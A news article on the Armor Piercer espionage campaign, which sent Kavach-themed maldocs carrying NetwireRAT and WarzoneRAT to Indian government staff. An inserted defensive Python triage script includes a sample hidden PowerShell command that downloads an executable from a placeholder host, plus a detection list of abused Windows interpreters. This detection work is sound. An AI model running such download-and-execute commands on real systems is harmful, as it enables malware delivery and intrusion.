Cyberattacks and malicious campaigns are becoming rampant, with new cybercriminal operations reported ever more often. Recently, security researchers at Cisco Talos uncovered a cyber espionage campaign, tracked as Armor Piercer, targeting employees in the government and defense sector in India with two Remote Access Trojans – NetwireRAT (also known as NetwireRC) and WarzoneRAT (also known as Ave Maria). The campaign was found to be distributing malicious documents to deploy the RATs and access confidential data.
NetwireRAT and WarzoneRAT are packed with a variety of capabilities, including:
- Stealing credentials from browsers and email clients
- Executing arbitrary commands
- Gathering system information
- File management operations such as writing, reading, copying, and deleting files
- Enumerating and terminating processes
- Remote desktop
- Webcam capture
- Reverse shells
Armor Piercer’s Phishing Campaign
Active since 2020, the campaign leverages operational documents related to Kavach as phishing lures to trick employees. Kavach is a two-factor authentication (2FA) app operated by India’s National Informatics Centre (NIC), used by government personnel in various departments to access their emails. Armor Piercer was also found using compromised websites and fake domains to host their malware payloads. It also used multiple phishing techniques to obfuscate itself and evade security detections.
Armor Piercer Attack Vector
Armor Piercer operators delivered their malware payloads to the targeted employees via phishing lures posing as security advisories or guides, in the form of malicious Microsoft Office documents (maldocs) and archives (RARs, ZIPs). Once a victim downloads the maldoc, it automatically downloads a loader responsible for deploying the final RAT payload on the targeted endpoint.
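A defender's view of the infection chain described above: the added Python below is not from the Talos report or this article, and triages constructed Sysmon-style process-creation records for the two hand-offs the chain relies on, an Office application launching a script interpreter or downloader, and an archive tool launching an executable from a user-writable path. The file names, paths and the example.invalid URL are constructed sample data, not campaign indicators.

```python
import re
from typing import Optional

# Constructed Sysmon-style process-creation records: "parent image|image|command line".
SAMPLE_EVENTS = [
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\splwow64.exe|splwow64.exe 12288",
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell.exe -w hidden -c iwr http://example.invalid/update -OutFile $env:TEMP\u.exe",
    r"C:\Windows\explorer.exe|C:\Program Files\WinRAR\WinRAR.exe|WinRAR.exe C:\Users\u\Downloads\Kavach_Guide.rar",
    r"C:\Program Files\WinRAR\WinRAR.exe|C:\Users\u\AppData\Local\Temp\Rar$EXa0.123\Kavach_Guide.pdf.exe|Kavach_Guide.pdf.exe",
    r"C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|WINWORD.EXE /n C:\Users\u\Downloads\advisory.docx",
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
ARCHIVERS = {"winrar.exe", "7zfm.exe"}
# Interpreters and system utilities a maldoc typically abuses to fetch and run a second stage.
INTERPRETERS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public)\\", re.I)
URL = re.compile(r"https?://", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(record: str) -> Optional[str]:
    """Return a verdict label for one record, or None if it matches no rule."""
    parent, image, cmdline = record.split("|", 2)
    p, c = basename(parent), basename(image)
    if p in OFFICE_APPS and c in INTERPRETERS:
        # Stage 1 of the chain: the document hands off to an interpreter; a URL on the
        # command line points at the loader download the article describes.
        return "office-spawned-downloader" if URL.search(cmdline) else "office-spawned-interpreter"
    if p in OFFICE_APPS and USER_WRITABLE.search(image):
        return "office-spawned-user-writable-binary"
    if p in ARCHIVERS and USER_WRITABLE.search(image) and c.endswith(".exe"):
        # Archive lure: an executable run straight out of the extraction directory.
        return "archive-launched-executable"
    return None


def triage(records) -> list:
    """Return (index, verdict) pairs for every record that trips a rule."""
    return [(i, v) for i, r in enumerate(records) if (v := classify(r)) is not None]


if __name__ == "__main__":
    for idx, verdict in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {verdict}")
```

Rule order matters: the Office-parent rules run first so that an interpreter launched from a user-writable path is still reported as the interpreter hand-off.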
“Apart from artifacts involved in the infection chains, we’ve also discovered the use of server-side scripts to carry out operational tasks such as sending out malicious emails and maintaining a presence on compromised sites via web shells. This provides additional insight into the attacker’s operational TTPs. Some of these lures and tactics utilized by the attackers bear a strong resemblance to the Transparent Tribe and SideCopy APT groups, including the use of compromised websites and fake domains,” the researchers said.
Commenting on the Armor Piercer cyber operation, Vishak Raman, Director, Security Business, Cisco India and SAARC, said, “Operation Armor Piercer is a grim reminder of the vulnerabilities still existing in our cybersecurity posture. To ensure end-to-end security of India’s most precious assets and information, government and defense agencies must implement a layered defense strategy that enables comprehensive visibility and coverage across all endpoints, accelerates response by leveraging automation and orchestration to enrich data, and reduces massive data sets into actionable insights through AI/ML and data analytics. Essentially, security must not be bolted on, rather built into every system and process to ensure infallible protection of people and assets.”